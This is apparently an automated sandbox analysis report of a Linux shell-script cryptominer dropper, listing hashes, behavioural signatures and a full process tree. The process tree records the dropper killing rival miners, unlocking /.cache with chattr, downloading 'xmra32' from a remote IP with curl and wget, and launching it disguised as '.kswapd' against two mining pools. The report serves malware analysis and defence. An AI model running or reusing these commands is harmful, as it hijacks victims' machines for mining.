Analysis
- max time kernel: 149s
- max time network: 154s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240611-en
- resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 30-06-2024 18:39
Static task
- static1
Behavioral tasks
- behavioral1: sample 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh, resource ubuntu1804-amd64-20240508-en
- behavioral2: sample 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh, resource debian9-armhf-20240418-en
- behavioral3: sample 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh, resource debian9-mipsbe-20240611-en
- behavioral4: sample 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh, resource debian9-mipsel-20240418-en
General
- Target: 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
- Size: 5KB
- MD5: 7b72cf30ac42c20f0a14b0b87425c00a
- SHA1: 74402152ac0f0c9dfed6f76975080ce1d0d4584d
- SHA256: 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
- SHA512: 1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
- SSDEEP: 96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8
Malware Config
Signatures
- Executes dropped EXE (2 IoCs)
  Processes (ioc, pid, process):
    /.cache/.kswapd  906  .kswapd
    /.cache/.kswapd  1103  .kswapd
- Attempts to change immutable files (37 IoCs)
  Modifies inode attributes on the filesystem to allow changing of immutable files.
  Processes (process: pids):
    chattr: 768, 975
    grep: 810, 814, 818, 822, 826, 830, 834, 838, 842, 849, 853, 857, 861, 865, 869, 873, 877, 890, 1016, 1020, 1024, 1028, 1032, 1036, 1040, 1044, 1048, 1052, 1056, 1060, 1064, 1068, 1072, 1079, 1086
- Enumerates running processes
  Discovers information about currently running processes on the system.
- Write file to user bin folder (1 TTP, 1 IoC)
  Processes (description, ioc, process):
    File opened for modification  /usr/local/bin/.QJHGrsevi  80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
- Reads CPU attributes (1 TTP, 6 IoCs)
  Processes (description, ioc, process):
    File opened for reading  /sys/devices/system/cpu/online  ps  (6 occurrences)
- Reads runtime system information (64 IoCs)
  Reads data from /proc virtual filesystem.
  Processes (description, ioc, process): every entry is "File opened for reading" by ps; the 64 iocs, in report order:
    /proc/371/cmdline, /proc/388/stat, /proc/22/cmdline, /proc/tty/drivers, /proc/16/cmdline, /proc/37/stat, /proc/4/stat, /proc/487/cmdline, /proc/755/cmdline, /proc/765/cmdline, /proc/980/cmdline, /proc/111/cmdline, /proc/15/stat, /proc/23/stat, /proc/699/status, /proc/12/cmdline, /proc/486/status, /proc/meminfo, /proc/12/status, /proc/694/stat, /proc/228/cmdline, /proc/320/stat, /proc/372/cmdline, /proc/101/status, /proc/69/stat, /proc/74/cmdline, /proc/22/stat, /proc/17/cmdline, /proc/326/stat, /proc/978/cmdline, /proc/988/cmdline, /proc/72/stat, /proc/80/cmdline, /proc/766/status, /proc/695/cmdline, /proc/17/status, /proc/75/status, /proc/228/status, /proc/988/status, /proc/1/cmdline, /proc/371/status, /proc/766/cmdline, /proc/804/stat, /proc/317/cmdline, /proc/972/status,
    /proc/788/cmdline, /proc/450/stat, /proc/uptime, /proc/23/cmdline, /proc/111/cmdline, /proc/694/stat, /proc/383/status, /proc/21/status, /proc/694/status, /proc/17/status, /proc/76/stat, /proc/1/cmdline, /proc/1/cmdline, /proc/11/status, /proc/450/status, /proc/76/stat, /proc/37/cmdline, /proc/762/cmdline, /proc/317/status
- Writes file to shm directory (1 IoC)
  Malware can drop malicious files in the shm directory, which will run directly from RAM.
  Processes (description, ioc, process):
    File opened for modification  /dev/shm/.QJHGrsevi  80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
- Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  Processes (description, ioc, process):
    File opened for modification  /tmp/.QJHGrsevi  80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Processes (image path: command line; indentation shows tree depth; triggered signatures in brackets)
- /tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh: /tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh  [Write file to user bin folder; Writes file to shm directory; Writes file to tmp directory]
  - /bin/uname: uname -a
  - /bin/rm: rm --help
  - /bin/grep: grep " rm does not remove dir"
  - /usr/bin/wc: wc -l
  - /bin/grep: grep -i "Dump libcurl equivalent"
  - /usr/bin/wc: wc -l
  - /usr/bin/curl: curl --help
  - /usr/bin/wget: wget --version
  - /bin/grep: grep -i "wgetrc "
  - /usr/bin/wc: wc -l
  - /usr/bin/head: head /dev/urandom
  - /usr/bin/tr: tr -dc A-Za-z0-9
  - /usr/bin/shuf: shuf -i 4-16 -n 1
  - /usr/bin/head: head -c 9
  - /bin/rm: rm -f /tmp/.QJHGrsevi
  - /bin/rm: rm -f /tmp/.QJHGrsevi
  - /bin/rm: rm -f /usr/local/bin/.QJHGrsevi
  - /bin/rm: rm -f /dev/shm/.QJHGrsevi
  - /bin/rm: rm -f /.QJHGrsevi
  - /bin/ps: ps aux  [Reads CPU attributes; Reads runtime system information]
  - /bin/grep: grep -v grep
  - /bin/grep: grep -v defunct
  - /bin/grep: grep -v "sh "
  - /bin/grep: grep " sleep 120"
  - /usr/bin/wc: wc -l
  - /bin/ps: ps aux  [Reads CPU attributes; Reads runtime system information]
  - /bin/grep: grep -v grep
  - /bin/grep: grep -v "sh "
  - /bin/grep: grep -v defunct
  - /bin/grep: grep " sleep 120"
  - /usr/bin/wc: wc -l
  - /bin/sleep: sleep 120
  - /bin/mkdir: mkdir -p /.cache/
  - /usr/bin/chattr: chattr -i /.cache/  [Attempts to change immutable files]
  - /bin/chmod: chmod 1755 /.cache/
  - /bin/ps: ps aux  [Reads CPU attributes; Reads runtime system information]
  - /bin/grep: grep -v l0
  - /bin/grep: grep -v eth1
  - /bin/grep: grep -v lan0
  - /bin/grep: grep -v "^-"
  - /bin/grep: grep -v eth0
  - /bin/grep: grep -v inet0
  - /bin/grep: grep -v lano
  - /bin/grep: grep -v grep
  - /bin/grep: grep -v defunct
  - /bin/grep: grep -v knthread
  - /bin/grep: grep -vi aaaaaaaaaa
  - /bin/grep: grep -vi "java "
  - /bin/grep: grep -vi jenkins
  - /bin/grep: grep -vi exim
  - /usr/bin/head: head -n 1
  - /usr/bin/awk: awk "{if(\$3>=54.0) print \$11}"
  - /bin/grep: grep -v l0
  - /bin/ps: ps aux  [Reads CPU attributes; Reads runtime system information]
  - /bin/grep: grep -v eth1
  - /bin/grep: grep -v lan0
  - /bin/grep: grep -v "^-"
  - /bin/grep: grep -v eth0
  - /bin/grep: grep -v inet0
  - /bin/grep: grep -v lano
  - /bin/grep: grep -v grep
  - /bin/grep: grep -v defunct
  - /bin/grep: grep -v python
  - /bin/grep: grep -v knthread
  - /bin/grep: grep -vi aaaaaaaaaa
  - /bin/grep: grep -vi bash
  - /bin/grep: grep -vi exim
  - /usr/bin/awk: awk "{if(\$3>=0.0) print \$2}"
  - /usr/bin/uniq: uniq
  - /bin/readlink: readlink /proc/317/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/317/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/319/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/319/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/320/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/320/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/326/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/328/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/328/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/371/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/371/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/372/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/372/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/383/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/383/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/388/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/388/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/450/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/450/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/457/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/457/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/690/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/690/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/693/cwd
  - /bin/cat: cat /proc/693/comm
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/694/cwd
  - /bin/cat: cat /proc/694/comm
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/695/cwd
  - /bin/cat: cat /proc/695/comm
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/699/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/699/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/701/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/701/exe  [Attempts to change immutable files]
  - /bin/rm: rm -rf /usr/sbin/agent
  - /bin/readlink: readlink /proc/766/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/766/exe  [Attempts to change immutable files]
  - /bin/grep: grep x86_64
  - /usr/bin/wc: wc -l
  - /usr/bin/curl: curl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd
  - /usr/bin/wget: wget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd
  - /bin/chmod: chmod +x /.cache/.kswapd
  - /bin/sleep: sleep 120
  - /bin/mkdir: mkdir -p /.cache/
  - /usr/bin/chattr: chattr -i /.cache/  [Attempts to change immutable files]
  - /bin/chmod: chmod 1755 /.cache/
  - /bin/ps: ps aux  [Reads CPU attributes; Reads runtime system information]
  - /bin/grep: grep -v l0
  - /bin/grep: grep -v eth1
  - /bin/grep: grep -v lan0
  - /bin/grep: grep -v "^-"
  - /bin/grep: grep -v eth0
  - /bin/grep: grep -v inet0
  - /bin/grep: grep -v lano
  - /bin/grep: grep -v grep
  - /bin/grep: grep -v defunct
  - /bin/grep: grep -v knthread
  - /bin/grep: grep -vi aaaaaaaaaa
  - /bin/grep: grep -vi "java "
  - /bin/grep: grep -vi jenkins
  - /bin/grep: grep -vi exim
  - /usr/bin/awk: awk "{if(\$3>=54.0) print \$11}"
  - /usr/bin/head: head -n 1
  - /bin/ps: ps aux  [Reads CPU attributes; Reads runtime system information]
  - /bin/grep: grep -v l0
  - /bin/grep: grep -v eth1
  - /bin/grep: grep -v lan0
  - /bin/grep: grep -v "^-"
  - /bin/grep: grep -v eth0
  - /bin/grep: grep -v inet0
  - /bin/grep: grep -v lano
  - /bin/grep: grep -v grep
  - /bin/grep: grep -v defunct
  - /bin/grep: grep -v python
  - /bin/grep: grep -v knthread
  - /bin/grep: grep -vi aaaaaaaaaa
  - /bin/grep: grep -vi bash
  - /bin/grep: grep -vi exim
  - /usr/bin/awk: awk "{if(\$3>=0.0) print \$2}"
  - /usr/bin/uniq: uniq
  - /bin/readlink: readlink /proc/317/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/317/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/319/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/319/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/320/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/320/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/326/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/328/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/328/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/371/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/371/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/372/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/372/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/383/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/383/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/388/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/388/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/450/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/450/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/457/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/457/exe  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/693/cwd
  - /bin/cat: cat /proc/693/comm
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/694/cwd
  - /bin/cat: cat /proc/694/comm
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/695/cwd
  - /bin/cat: cat /proc/695/comm
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/883/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/883/exe  [Attempts to change immutable files]
  - /bin/rm: rm -rf /usr/sbin/agent "(deleted)"
  - /bin/readlink: readlink /proc/971/cwd
  - /bin/cat: cat /proc/971/comm
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" //kworker/0:0  [Attempts to change immutable files]
  - /bin/readlink: readlink /proc/973/exe
  - /bin/grep: grep -i "xmr\\|cryptonight\\|hashrate" /proc/973/exe  [Attempts to change immutable files]
  - /usr/bin/md5sum: md5sum /.cache/.kswapd
  - /usr/bin/cut: cut -c 1-32
  - /usr/bin/md5sum: md5sum /.cache/.kswapd
  - /usr/bin/cut: cut -c 1-32
  - /bin/grep: grep x86_64
  - /usr/bin/wc: wc -l
  - /usr/bin/curl: curl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd
  - /usr/bin/wget: wget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd
  - /bin/chmod: chmod +x /.cache/.kswapd
- /.cache/.kswapd: /.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B  [Executes dropped EXE]
- /.cache/.kswapd: /.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B  [Executes dropped EXE]
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- /tmp/.QJHGrsevi
  Filesize: 10B
  MD5: aa5057d980a3be15376cb6c92c04b9da
  SHA1: 2b9ebc4a8b48ec1759385e40899954be31faf4cd
  SHA256: 808fde5dd676e54423bcb4f17bc072ddf2be2c1e060cfacaff6eadc72990227d
  SHA512: 286010c0689512476409463521fe1a40d3d03522bffcbfa52aebda4e0d2125d56f4d89c98b55ee36942006b275a94cc2437a24769927fa8957bf96825bb95c5e